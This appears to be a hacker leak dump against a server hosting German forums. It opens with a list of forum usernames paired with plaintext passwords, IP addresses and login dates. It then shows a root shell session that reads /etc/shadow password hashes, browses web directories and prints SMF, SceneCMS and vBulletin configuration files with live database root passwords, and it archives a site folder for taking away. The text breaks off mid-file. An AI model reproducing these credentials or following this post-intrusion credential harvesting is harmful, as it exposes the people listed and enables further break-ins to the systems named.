+habadu:268413597:79.226.244.159:January 7, 2011, 12:05 am +loldielol:server1:91.55.112.62:January 5, 2011, 6:07 pm +kolumbus:infanterist2000:95.119.12.201:January 3, 2011, 8:31 pm +freefall:88866654:87.174.242.241:January 5, 2011, 10:27 am +lpboy:minkin:217.23.6.162:January 5, 2011, 8:10 pm +freaky123:05151942662:77.187.60.32:January 6, 2011, 12:32 am +kanye:Undertaker:92.241.165.69:January 5, 2011, 10:27 pm +codered:3081994:84.62.202.48:January 5, 2011, 4:21 pm +derboss:derboss:78.49.17.208:January 3, 2011, 8:52 pm +mandy:hallo123456:91.58.51.156:January 4, 2011, 3:58 pm +robmocdoc:881562:87.122.33.146:January 6, 2011, 3:07 pm +mcknad:masterxx1994:92.194.116.34:January 5, 2011, 6:45 pm +dre4m:gulliox90:188.104.236.248:January 4, 2011, 6:26 pm +matzeyooo:heheyo12345:212.117.172.231:January 6, 2011, 3:03 am +kerber0s:brennberg-1993:93.240.244.74:January 5, 2011, 5:43 pm +lenox26:250384:95.211.99.91:January 3, 2011, 6:41 pm +sidosido123:sidosido123:78.35.50.188:January 5, 2011, 1:53 am +mrsocke:fckgwrhqq2:77.189.137.162:January 4, 2011, 5:45 pm +schatten123:stinker:93.208.70.28:January 3, 2011, 6:56 pm +ev0lein:scheisripper:87.118.120.182:January 3, 2011, 5:53 pm +gweojk904trj:AOGWD55GMpUqCtB6Gsw2:92.241.190.253:January 4, 2011, 9:29 pm +wolfgang:florian90:85.178.145.194:January 3, 2011, 1:33 pm +cronic:67öänht53snjl:207.126.166.242:January 3, 2011, 10:04 pm +w333d:w333d1:92.241.168.90:January 3, 2011, 11:18 am +genetik10:s09101987:78.94.194.123:January 3, 2011, 2:19 pm +elektro:elektrisch1:77.12.190.94:January 3, 2011, 5:51 pm +amobios:welensitich9872582:89.149.242.16:January 3, 2011, 2:50 am +mablutze:tobias12:91.112.18.154:January 4, 2011, 8:43 pm +artist:yucatan1:82.198.80.81:January 4, 2011, 2:33 pm +dukeraider:muschi:188.193.200.182:January 3, 2011, 10:06 am +frankylo:Franky123456789*:95.211.13.145:January 3, 2011, 5:12 pm +dusa123:123456789:79.246.188.21:January 5, 2011, 1:14 am +asdfghjkl:carders231:84.161.40.27:January 5, 2011, 3:50 pm + +# uname -a +Linux morphy 2.6.18-164.11.1.el5.028stab068.3 #1 SMP Wed Feb 17 15:22:30 MSK 2010 x86_64 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/issue +Debian GNU/Linux 5.0 \n \l + +# cat /etc/passwd /etc/shadow +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin +mysql:x:102:104:MySQL Server,,,:/var/lib/mysql:/bin/false +Debian-exim:x:103:105::/var/spool/exim4:/bin/false +proftpd:x:104:65534::/var/run/proftpd:/bin/false +ftp:x:105:65534::/home/ftp:/bin/false +hdf:x:1000:1000::/home/hdf:/bin/sh +root:$1$SwmLmdGE$Unk7WkRpv7NF3O/0YSTCh/:14849:0:99999:7::: +daemon:*:14237:0:99999:7::: +bin:*:14237:0:99999:7::: +sys:*:14237:0:99999:7::: +sync:*:14237:0:99999:7::: +games:*:14237:0:99999:7::: +man:*:14237:0:99999:7::: +lp:*:14237:0:99999:7::: +mail:*:14237:0:99999:7::: +news:*:14237:0:99999:7::: +uucp:*:14237:0:99999:7::: +proxy:*:14237:0:99999:7::: +www-data:*:14237:0:99999:7::: +backup:*:14237:0:99999:7::: +list:*:14237:0:99999:7::: +irc:*:14237:0:99999:7::: +gnats:*:14237:0:99999:7::: +nobody:*:14237:0:99999:7::: +libuuid:!:14237:0:99999:7::: +sshd:*:14237:0:99999:7::: +mysql:!:14647:0:99999:7::: +Debian-exim:!:14647:0:99999:7::: +proftpd:!:14655:0:99999:7::: +ftp:$1$0LKSrIAD$rt1vOaeYC8GrKvVzI.T6s.:14662:0:99999:7::: +hdf:$1$RQkebH9N$LrPDCbeYn3.czmOpaM8nn.:14662:0:99999:7::: + +# cd / && ls -la +total 168 +drwxr-xr-x 21 root root 4096 Nov 18 23:11 . +drwxr-xr-x 21 root root 4096 Nov 18 23:11 .. +drwxr-xr-x 10 root root 4096 Feb 15 2010 SMF +lrwxrwxrwx 1 root root 39 Nov 13 13:09 aquota.group -> /proc/vz/vzaquota/0000001e/aquota.group +lrwxrwxrwx 1 root root 38 Nov 13 13:09 aquota.user -> /proc/vz/vzaquota/0000001e/aquota.user +-rwxr-xr-x 1 root root 122 Aug 21 17:30 backup.sh +drwxr-xr-x 2 root root 4096 May 13 2010 bin +drwxr-xr-x 2 root root 4096 Dec 4 2008 boot +drwxr-xr-x 4 root root 4096 Jan 7 06:25 dev +drwxr-xr-x 57 root root 4096 Nov 13 13:09 etc +drwxr-xr-x 4 root root 4096 Feb 15 2010 home +drwxr-xr-x 10 root root 4096 Feb 15 2010 lib +lrwxrwxrwx 1 root root 4 Mar 15 2010 lib64 -> /lib +drwxr-xr-x 2 root root 4096 Dec 24 2008 media +drwxr-xr-x 2 root root 4096 Dec 4 2008 mnt +drwxr-xr-x 2 root root 4096 Dec 24 2008 opt +dr-xr-xr-x 55 root root 0 Nov 13 13:09 proc +drwx------ 6 root root 4096 Jan 7 22:18 root +drwxr-xr-x 2 root root 4096 Feb 7 2010 sbin +drwxr-xr-x 2 root root 4096 Sep 16 2008 selinux +drwxr-xr-x 2 root root 4096 Dec 24 2008 srv +drwxr-xr-x 3 root root 0 Nov 13 13:09 sys +drwxrwxrwt 4 root root 4096 Jan 7 18:22 tmp +drwxr-xr-x 11 root root 4096 Dec 24 2008 usr +drwxr-xr-x 14 root root 4096 Mar 15 2010 var +-rwxr-xr-x 1 root root 83749 Sep 8 17:15 xgoogler + +# cat backup.sh +#!/bin/bash + +name=`date | sed -e "s/ /_/g"` +name=`echo "/${name}__vpn24org_backup.tgz"` +tar cfvz "$name" /root/ /var/www/ + +# cd /var/www && ls -la +total 40 +drwxr-xr-x 9 root root 4096 Dec 28 02:33 . +drwxr-xr-x 14 root root 4096 Mar 15 2010 .. +drwxr-xr-x 2 root root 4096 Nov 15 17:35 a +drwxrwxrwx 3 root root 4096 Oct 13 23:26 dreckrebea12313 +drwxrwxrwx 3 root root 4096 Apr 15 2010 dreckrebea12313123123131313131312313123 +-rwxrwxrwx 1 root root 1 Sep 16 23:19 index.php +drwxr-xr-x 16 root root 4096 Oct 17 22:20 sadas.org +drwxrwxrwx 4 root root 4096 Oct 1 09:18 scenecms.org +drwxr-xr-x 3 root root 4096 Dec 13 22:18 vpn24.org + +# cd dreckrebea12313 && ls -la +total 20 +drwxrwxrwx 3 root root 4096 Oct 13 23:26 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 132 Oct 13 23:15 adsads.rar +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +drwxrwxrwx 3 root root 4096 Jan 7 22:20 web + +# cd web && ls -la +total 40 +drwxrwxrwx 3 root root 4096 Jan 7 22:20 . +drwxrwxrwx 3 root root 4096 Oct 13 23:26 .. +drwsrwsrwt 9 root root 4096 Apr 22 2010 board +-rwsrwsrwt 1 root root 1033 Apr 19 2010 index.php #+s root? Holy crap! +-rw-r--r-- 1 root root 0 Apr 22 2010 ipinfo.html +-rw-r--r-- 1 root root 23564 Apr 19 2010 sc.png + +# cd board && ls -la +total 228 +drwsrwsrwt 9 root root 4096 Apr 22 2010 . +drwxrwxrwx 3 root root 4096 Jan 7 22:20 .. +drwxrwxrwx 3 root root 4096 Apr 22 2010 Packages +-rw-r--r-- 1 root root 74243 Feb 14 2010 SSI.php +-rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings.php +-rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings_bak.php +drwxrwxrwx 5 root root 4096 Apr 22 2010 Smileys +drwxr-sr-x 2 root root 4096 Apr 22 2010 Sources +drwxrwxrwx 8 root root 4096 Apr 22 2010 Themes +-rwxrwxrwx 1 root root 3343 Jun 5 2005 agreement.txt +drwxrwxrwx 2 root root 4096 Apr 24 2010 attachments +drwxrwxrwx 4 root root 4096 Apr 22 2010 avatars +drwxrwxrwx 2 root root 12288 Dec 28 02:20 cache +-rw-r--r-- 1 root root 15347 Feb 14 2010 index.php +-rw-r--r-- 1 root root 3975 Jan 6 2009 license.txt +-rw-r--r-- 1 root root 2650 Feb 23 2010 news_readme.html +-rw-r--r-- 1 root root 12350 Feb 23 2010 readme.html +-rw-r--r-- 1 root root 30030 Feb 14 2010 ssi_examples.php +-rw-r--r-- 1 root root 5909 Jan 1 2010 ssi_examples.shtml +-rw-r--r-- 1 root root 10147 Feb 14 2010 subscriptions.php + +# cat Settings.php +<?php +/********************************************************************************** +* Settings.php * +*********************************************************************************** +* SMF: Simple Machines Forum * +* Open-Source Project Inspired by Zef Hemel (zef@zefhemel.com) * +* =============================================================================== * +* Software Version: SMF 2.0 RC3 * +* Software by: Simple Machines (http://www.simplemachines.org) * +* Copyright 2006-2010 by: Simple Machines LLC (http://www.simplemachines.org) * +* 2001-2006 by: Lewis Media (http://www.lewismedia.com) * +* Support, News, Updates at: http://www.simplemachines.org * +*********************************************************************************** +* This program is free software; you may redistribute it and/or modify it under * +* the terms of the provided license as published by Simple Machines LLC. * +* * +* This program is distributed in the hope that it is and will be useful, but * +* WITHOUT ANY WARRANTIES; without even any implied warranty of MERCHANTABILITY * +* or FITNESS FOR A PARTICULAR PURPOSE. * +* * +* See the "license.txt" file for details of the Simple Machines license. * +* The latest version can always be found at http://www.simplemachines.org. * +**********************************************************************************/ + +########## Maintenance ########## +# Note: If $maintenance is set to 2, the forum will be unusable! Change it to 0 to fix it. +$maintenance = 0; # Set to 1 to enable Maintenance Mode, 2 to make the forum untouchable. (you'll have to make it 0 again manually!) +$mtitle = 'Maintenance Mode'; # Title for the Maintenance Mode message. +$mmessage = 'Okay faithful users...we\'re attempting to restore an older backup of the database...news will be posted once we\'re back!'; # Description of why the forum is in maintenance mode. + +########## Forum Info ########## +$mbname = 'SceneCrypt'; # The name of your forum. +$language = 'english'; # The default language file set for the forum. +$boardurl = 'http://scenecrypt.org/board'; # URL to your forum's folder. (without the trailing /!) +$webmaster_email = 'admin@admin.de'; # Email address to send emails from. (like noreply@yourdomain.com.) +$cookiename = 'SMFCookie410'; # Name of the cookie to set for authentication. + +########## Database Info ########## +$db_type = 'mysql'; +$db_server = 'localhost'; +$db_name = 'smf13'; +$db_user = 'root'; +$db_passwd = 'QkZorIZZC5e'; +$ssi_db_user = ''; +$ssi_db_passwd = ''; +$db_prefix = 'smf13_'; +$db_persist = 0; +$db_error_send = 1; + +########## Directories/Files ########## +# Note: These directories do not have to be changed unless you move things. +$boarddir = '/var/www/scenecrypt.org/web/board'; # The absolute path to the forum's folder. (not just '.'!) +$sourcedir = '/var/www/scenecrypt.org/web/board/Sources'; # Path to the Sources directory. +$cachedir = '/var/www/scenecrypt.org/web/board/cache'; # Path to the cache directory. + +########## Error-Catching ########## +# Note: You shouldn't touch these settings. +$db_last_error = 0; + + +# Make sure the paths are correct... at least try to fix them. +if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . '/agreement.txt')) + $boarddir = dirname(__FILE__); +if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources')) + $sourcedir = $boarddir . '/Sources'; +if (!file_exists($cachedir) && file_exists($boarddir . '/cache')) + $cachedir = $boarddir . '/cache'; + +$db_character_set = 'utf8'; + +# cd /var/www/dreckrebea12313123123131313131312313123/ && ls -la +total 16 +drwxrwxrwx 3 root root 4096 Apr 15 2010 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +drwxrwxrwx 4 root root 4096 Apr 15 2010 web + +# cd web && ls -la +total 68 +drwxrwxrwx 4 root root 4096 Apr 15 2010 . +drwxrwxrwx 3 root root 4096 Apr 15 2010 .. +-rwxrwxrwx 1 root root 983 Mar 15 2010 conf.php +drwxrwxrwx 3 root root 4096 May 11 2010 images +-rw-r--r-- 1 root root 42787 Apr 15 2010 index.php +-rw-r--r-- 1 root root 1 Apr 15 2010 index__.php +drwxrwxrwx 3 root root 4096 Mar 15 2010 psc + +# cat conf.php +<?php +define(_SceneCMS_footer, "SceneCMS v1.0"); +define(_SceneCMS_admin, "mimimi"); +define(_SceneCMS_Host, "localhost"); +define(_SceneCMS_Username, "qstore"); +define(_SceneCMS_Password, "4cFRwaLnt2qS2QSp"); +define(_SceneCMS_Database, "qstore"); + +mysql_connect(_SceneCMS_Host,_SceneCMS_Username,_SceneCMS_Password); +mysql_select_db(_SceneCMS_Database); + + + function strFilter($text) { + return (string)htmlentities($text); + } + +function sql_str_escape($str) { + if(get_magic_quotes_gpc()) + stripslashes($str); + return mysql_real_escape_string($str); +} + + function Logout() { + $_SESSION['cms_name'] = ""; + $_SESSION['cms_validate'] = ""; + session_destroy(); + + } + + function CheckLogin($killtrue) { + + if ($_SESSION['cms_name'] == "" or $_SESSION['cms_validate'] == "") { + if($killtrue == 1 or $killtrue == "1") { + echo ' + <script> + window.location.href = "?"; + </script> + '; + die("No Access"); + exit(); + } + return "0"; + } else { + return "1"; + } + } +?> + +# tar cvjf /tmp/psc.tar.bz2 psc/ +psc/ +psc/data/ +psc/data/money-coin.png +psc/data/Webbrowser.class.php +psc/data/bg_code.jpg +psc/data/bg.jpg +psc/data/bg_lock.jpg +psc/data/bg_captcha.jpg +psc/index.html +psc/api.php +psc/cookie.txt + +# cd /var/www/sadas.org/ && ls -la +total 5632 +drwxr-xr-x 16 root root 4096 Oct 17 22:20 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 19565 Apr 5 2010 LICENSE +drwxr-xr-x 3 root root 4096 Apr 5 2010 admincp +-rw-r--r-- 1 root root 23760 Apr 5 2010 ajax.php +-rw-r--r-- 1 root root 75427 Apr 5 2010 album.php +-rw-r--r-- 1 root root 17051 Apr 5 2010 announcement.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 archive +-rw-r--r-- 1 root root 18225 Apr 5 2010 attachment.php +-rw-r--r-- 1 root root 75242 Apr 5 2010 calendar.php +-rw-r--r-- 1 root root 58135 Apr 5 2010 checksums.md5 +-rw-r--r-- 1 root root 43 Apr 5 2010 clear.gif +drwxr-xr-x 4 root root 4096 Apr 5 2010 clientscript +-rw-r--r-- 1 root root 15277 Apr 5 2010 converse.php +drwxr-xr-x 7 root root 4096 Apr 5 2010 cpstyles +-rw-r--r-- 1 root root 3233 Apr 5 2010 cron.php +drwxr-xr-x 3 root root 4096 Apr 5 2010 customavatars +drwxr-xr-x 3 root root 4096 Apr 5 2010 customgroupicons +drwxr-xr-x 2 root root 4096 Apr 5 2010 customprofilepics +-rw-r--r-- 1 root root 3485 Apr 5 2010 dgt_released.nfo +-rw-r--r-- 1 root root 47671 Apr 5 2010 editpost.php +-rw-r--r-- 1 root root 29410 Apr 5 2010 external.php +-rw-r--r-- 1 root root 9702 Apr 5 2010 faq.php +-rw-r--r-- 1 root root 10134 Apr 5 2010 favicon.ico +-rw-r--r-- 1 root root 521 Apr 5 2010 file_id.diz +-rw-r--r-- 1 root root 35900 Apr 5 2010 forumdisplay.php +-rw-r--r-- 1 root root 39747 Apr 5 2010 global.php +-rw-r--r-- 1 root root 138104 Apr 5 2010 group.php +-rw-r--r-- 1 root root 24835 Apr 5 2010 group_inlinemod.php +-rw-r--r-- 1 root root 10747 Apr 5 2010 groupsubscription.php +-rw-r--r-- 1 root root 8963 Apr 5 2010 image.php +drwxr-xr-x 16 root root 4096 Apr 5 2010 images +drwxr-xr-x 6 root root 12288 May 22 2010 includes +-rw-r--r-- 1 root root 19508 Apr 5 2010 index.php +-rw-r--r-- 1 root root 43844 Apr 5 2010 infraction.php +-rw-r--r-- 1 root root 182837 Apr 5 2010 inlinemod.php +drwxr-xr-x 2 root root 4096 May 22 2010 install +-rw-r--r-- 1 root root 10258 Apr 5 2010 joinrequests.php +-rw-r--r-- 1 root root 10138 Apr 5 2010 login.php +-rw-r--r-- 1 root root 16980 Apr 5 2010 member.php +-rw-r--r-- 1 root root 15847 Apr 5 2010 member_inlinemod.php +-rw-r--r-- 1 root root 35817 Apr 5 2010 memberlist.php +-rw-r--r-- 1 root root 23782 Apr 5 2010 misc.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 modcp +-rw-r--r-- 1 root root 63240 Apr 5 2010 moderation.php +-rw-r--r-- 1 root root 6672 Apr 5 2010 moderator.php +-rw-r--r-- 1 root root 18392 Apr 5 2010 newattachment.php +-rw-r--r-- 1 root root 37017 Apr 5 2010 newreply.php +-rw-r--r-- 1 root root 18827 Apr 5 2010 newthread.php +-rw-r--r-- 1 root root 19520 Apr 5 2010 online.php +-rw-r--r-- 1 root root 7612 Apr 5 2010 payment_gateway.php +-rw-r--r-- 1 root root 11826 Apr 5 2010 payments.php +-rw-r--r-- 1 root root 7805 Apr 5 2010 picture.php +-rw-r--r-- 1 root root 21956 Apr 5 2010 picture_inlinemod.php +-rw-r--r-- 1 root root 25223 Apr 5 2010 picturecomment.php +-rw-r--r-- 1 root root 27328 Apr 5 2010 poll.php +-rw-r--r-- 1 root root 9428 Apr 5 2010 posthistory.php +-rw-r--r-- 1 root root 74284 Apr 5 2010 postings.php +-rw-r--r-- 1 root root 6509 Apr 5 2010 printthread.php +-rw-r--r-- 1 root root 70656 Apr 5 2010 private.php +-rw-r--r-- 1 root root 152244 Apr 5 2010 profile.php +-rw-r--r-- 1 root root 39667 Apr 5 2010 register.php +-rw-r--r-- 1 root root 5603 Apr 5 2010 report.php +-rw-r--r-- 1 root root 13635 Apr 5 2010 reputation.php +-rw-r--r-- 1 root root 124633 Apr 5 2010 search.php +-rw-r--r-- 1 root root 20862 Apr 5 2010 sendmessage.php +-rw-r--r-- 1 root root 9925 Apr 5 2010 showgroups.php +-rw-r--r-- 1 root root 12304 Apr 5 2010 showpost.php +-rw-r--r-- 1 root root 75611 Apr 5 2010 showthread.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 signaturepics +-rw-r--r-- 1 root root 32792 Apr 5 2010 subscription.php +-rw-r--r-- 1 root root 13281 Apr 5 2010 tags.php +-rw-r--r-- 1 root root 8608 Apr 5 2010 threadrate.php +-rw-r--r-- 1 root root 12331 Apr 5 2010 threadtag.php +drwxr-xr-x 2 root root 4096 May 22 2010 upload +-rw-r--r-- 1 root root 34424 Apr 5 2010 usercp.php +-rw-r--r-- 1 root root 19011 Apr 5 2010 usernote.php +-rw-r--r-- 1 root root 29490 Apr 5 2010 validator.php +-rw-r--r-- 1 root root 3417514 May 22 2010 vb38.rar +-rw-r--r-- 1 root root 27293 Apr 5 2010 visitormessage.php +drwxr-xr-x 2 root root 4096 May 22 2010 web + +# cat includes/config.php +<?php +/*======================================================================*\ +|| #################################################################### || +|| # vBulletin 3.8.5 +|| # ---------------------------------------------------------------- # || +|| # All PHP code in this file is ?2000-2010 Jelsoft Enterprises Ltd. # || +|| # This file may not be redistributed in whole or significant part. # || +|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || +|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || +|| #################################################################### || +\*======================================================================*/ + +/*-------------------------------------------------------*\ +| ****** HINWEIS ZU DEN VARIABLEN IN DIESER DATEI ******* | ++---------------------------------------------------------+ +| Falls bei dem Verbindungsaufbau zu Ihrer MySQL-Daten- | +| bank Fehler auftreten, muessen Sie Ihren Provider um | +| Hilfe bitten, da wir Ihnen die richtigen Daten fuer die | +| Variablen in dieser Datei nicht nennen koennen. | +\*-------------------------------------------------------*/ + + // ****** DATENBANK: TYP ****** + // Tragen Sie hier den Typ Ihres Datenbankservers ein, auf dem sich die vBulletin-Datenbank + // befinden wird bzw. befindet. Gueltige Optionen sind mysql und mysqli. + // Versuchen Sie es mit mysqli, wenn Sie PHP 5 und MySQL 4.1+ verwenden. + // Wenn Sie eine Master-Slave Datenbankkonfiguration betreiben moechten, tragen Sie 'mysql_slave' bzw. 'mysqli_slave' ein. +$config['Database']['dbtype'] = 'mysql'; + + // ****** DATENBANK: NAME DER DATENBANK ****** + // Tragen Sie hier den Namen der Datenbank ein, mit der vBulletin arbeiten soll. + // Diesen Datenbanknamen erhalten Sie normalerweise von Ihrem Provider. +$config['Database']['dbname'] = 'cccteam'; + + // ****** TABELLEN-PRAEFIX ****** + // Praefix, das den Tabellennamen in der Datenbank vorangestellt wird. + // Zum Beispiel: $config['Database']['tableprefix'] = 'vb3_'; + // Hinweis: Praefixe fuer die Tabellennamen koennen Sie mit der Datei + // install/tableprefix.php hinzufuegen, aendern oder entfernen. +$config['Database']['tableprefix'] = ''; + + // ****** TECHNISCHE E-MAIL-ADRESSE ****** + // Treten Fehler bei der Datenbank auf, wird eine E-Mail mit einer Fehlerbeschreibung + // an diese Adresse geschickt. + // Falls Sie hier keine E-Mail-Adresse eintragen, werden bei Datenbankfehlern keine + // E-Mails verschickt. +$config['Database']['technicalemail'] = 'dbmeister@beispiel.xy'; + + // ****** LEEREN SQL-MODUS ERZWINGEN ****** + // In neueren Versionen von MySQL (4.1+) gibt es einige Neuerungen, die nicht mit vBulletin + // kompatibel sind. Wenn Sie diese Einstellung auf "true" setzen, werden diese Neuerungen + // deaktiviert. Sie muessen diese Einstellung nur aendern, wenn vBulletin Sie dazu auffordert. +$config['Database']['force_sql_mode'] = false; + + + + // ****** MASTER-DATENBANK: SERVERNAME UND PORT ****** + // Tragen Sie hier den Hostnamen oder die IP-Adresse und den Port Ihres Datenbankservers ein. + // Wenn Sie sich nicht sicher sind, was Sie hier eintragen muessen, versuchen Sie es zunaechst + // mit dem Standardwerten. +$config['MasterServer']['servername'] = 'localhost'; +$config['MasterServer']['port'] = 3306; + + // ****** MASTER-DATENBANK: BENUTZERNAME & KENNWORT ****** + // Tragen Sie hier den Benutzernamen und das Kennwort ein, die Sie fuer den Zugriff + // auf den MySQL-Server benoetigen. + // Den Benutzernamen und das Kennwort erhalten Sie von Ihrem Provider. +$config['MasterServer']['username'] = 'root'; +$config['MasterServer']['password'] = 'QkZorIZZC5e'; + + // ****** MASTER-DATENBANK: PERSISTENTE VERBINDUNGEN ****** + // Hier koennen Sie festlegen, ob persistente Verbindungen zu MySQL genutzt werden sollen. + // Der Performance-Unterschied ist im Normalfall vernachlaessigbar, ausser vielleicht + // bei extrem grossen Foren. + // Wenn Sie nicht sicher sind, was Sie hier angeben sollen, lassen Sie die Einstellung + // auf aus. + // 0 = aus; 1 = an +$config['MasterServer']['usepconnect'] = 0; + + + + // ****** SLAVE-DATENBANK: KONFIGURATION ****** + // Wenn Sie zwei Datenbankserver verwenden, koennen Sie hier die Daten fuer den Slave-Server + // festlegen. + // Wenn Sie sich nicht 100% sicher sind, ob Sie hier etwas eintragen muessen, veraendern Sie die + // Standardeinstellungen nicht. +$config['SlaveServer']['servername'] = ''; +$config['SlaveServer']['port'] = 3306; +$config['SlaveServer']['username'] = ''; +$config['SlaveServer']['password'] = ''; +$config['SlaveServer']['usepconnect'] = 0; + + + + // ****** PFADE ZUM ADMINISTRATOR- UND MODERATOR-KONTROLLZENTRUM ****** + // Hier koennen Sie fuer die Verzeichnisse, in denen sich die Dateien fuer das + // Administrator- und Moderator-Kontrollzentrum befinden, alternative Namen an- + // geben. Vielleicht moechten Sie dies aus Sicherheitsgruenden tun. + // Bitte beachten Sie, dass, wenn Sie die Namen hier aendern, Sie auch noch die + // Namen der Verzeichnisse auf dem Server aendern muessen. +$config['Misc']['admincpdir'] = 'admincp'; +$config['Misc']['modcpdir'] = 'modcp'; + + // ****** COOKIE-PRAEFIX ****** + // Praefix, das in allen vBulletin-Cookies enthalten ist. + // Halten Sie es kurz und verwenden Sie nur Zahlen und Buchstaben, d.h. 1-9 und a-Z +$config['Misc']['cookieprefix'] = 'bb'; + + // ****** VOLLSTAENDIGER PFAD ZUM VERZEICHNIS DES FORUMS ****** + // Bei einigen Servern kann es noetig sein, den vollstaendigen Pfad zum Verzeichnis des Forums + // anzugeben, damit vBulletin ohne Probleme funktioniert. Sie muessen diese Einstellung nur + // aendern, wenn vBulletin Sie dazu auffordert. + // Hinweis: Verwenden Sie keinen abschliessenden Schraegstrich ('/') nach dem Verzeichnisnamen. + // Beispiel fuer Unix: + // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; + // Beispiel fuer Win32: + // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3'; +$config['Misc']['forumpath'] = ''; + + // ****** COOKIE SICHERHEITS HASH ****** + // Diese Option erlaubt die Cookies zu verschluesseln. + // Benutzbar sind dabei jegliche Zahlen und Buchstaben, d.h. 1-9 und a-Z. + // Diese Angabe kann leer gelassen werden um den Standard zu benutzen. + // Hinweis: Bei Aenderung werden alle Benutzer ausgeloggt. +$config['Misc']['cookie_security_hash'] = ''; + + + // ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG SEHEN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum das + // Kontrollzentrum-Log ansehen. + // Die Benutzer werden hier durch ihre User-ID angegeben. Um die User-ID heraus- + // zufinden, sehen Sie sich den Benutzer im Administrator-Kontrollzentrum an. + // Falls Sie diese Datei fuer eine Neuinstallation aendern, lassen Sie den Standard- + // wert stehen, da der erste Benutzer (Administrator) die User-ID 1 erhaelt. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander. + // Beispiel 1: $config['SpecialUsers']['canviewadminlog'] = '1'; + // Beispiel 2: $config['SpecialUsers']['canviewadminlog'] = '1,5,9'; +$config['SpecialUsers']['canviewadminlog'] = '1'; + + // ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG LOESCHEN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // Eintraege aus dem Kontrollzentrum-Log loeschen. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['canpruneadminlog'] = '1'; + + // ****** BENUTZER, DIE QUERYS AUSFUEHREN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // Querys (Datenbankabfragen) ausfuehren. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). + // Hinweis: Querys ausfuehren zu koennen, kann eine kritische Angelegenheit sein. + // Aus Sicherheitsgruenden sollten Sie in diese Liste keine User-IDs eintragen. +$config['SpecialUsers']['canrunqueries'] = ''; + + // ****** UNLOESCHBARE / UNVERAENDERBARE BENUTZER ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // von anderen Benutzern nicht geloescht oder bearbeitet werden. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['undeletableusers'] = ''; + + // ****** SUPER-ADMINISTRATOREN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum die + // Seite fuer die Administrator-Berechtigungen aufrufen und damit die Rechte + // anderer Administratoren bearbeiten. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['superadministrators'] = '1'; + + // ****** DATASTORE-CACHE KONFIGURATION ****** + // Hier koennen Sie die verschiedenen Methoden konfigurieren, die fuer den Cache + // der Datastore-Elemente verwendet werden. + // vB_Datastore_Filecache - um die Cache-Datei /includes/datastore/datastore_cache.php zu verwenden (CHMOD 777 benoetigt) + // vB_Datastore_APC - um APC zu verwenden + // vB_Datastore_XCache - um XCache zu verwenden + // vB_Datastore_eAccelerator - um eAccelerator zu verwenden + // vB_Datastore_Memcached - um einen Memcache-Server zu verwenden (Konfiguration weiter unten) +// $config['Datastore']['class'] = 'vB_Datastore_Filecache'; + + // ****** DATASTORE-PRAEFIX ****** + // Wenn Sie einen PHP-Cache (APC, XCache, eAccelerator) verwenden und auf Ihrem + // Server mehr als ein Forum installiert ist, *kann* es sein, dass Sie hier + // ein Datastore-Praefix angeben muessen, damit die Foren nicht dieselbe + // Variable im Cache verwenden. + // Dies funktioniert aehnlich wie das Tabellen-Praefix fuer die Datenbank. +// $config['Datastore']['prefix'] = ''; + + // Bei einem Memcache-Server ist es auch notwendig, dass Sie den Hostnamen bzw. + // die IP-Adresse und den Port angeben, unter denen der Server erreichbar ist: +/* +$config['Datastore']['class'] = 'vB_Datastore_Memcached'; +$i = 0; +// Erster Server +$i++; +$config['Misc']['memcacheserver'][$i] = '127.0.0.1'; +$config['Misc']['memcacheport'][$i] = 11211; +$config['Misc']['memcachepersistent'][$i] = true; +$config['Misc']['memcacheweight'][$i] = 1; +$config['Misc']['memcachetimeout'][$i] = 1; +$config['Misc']['memcacheretry_interval'][$i] = 15; +*/ + +// ******************************************************************************** +// ****** Die folgenden Einstellungen werden nur in 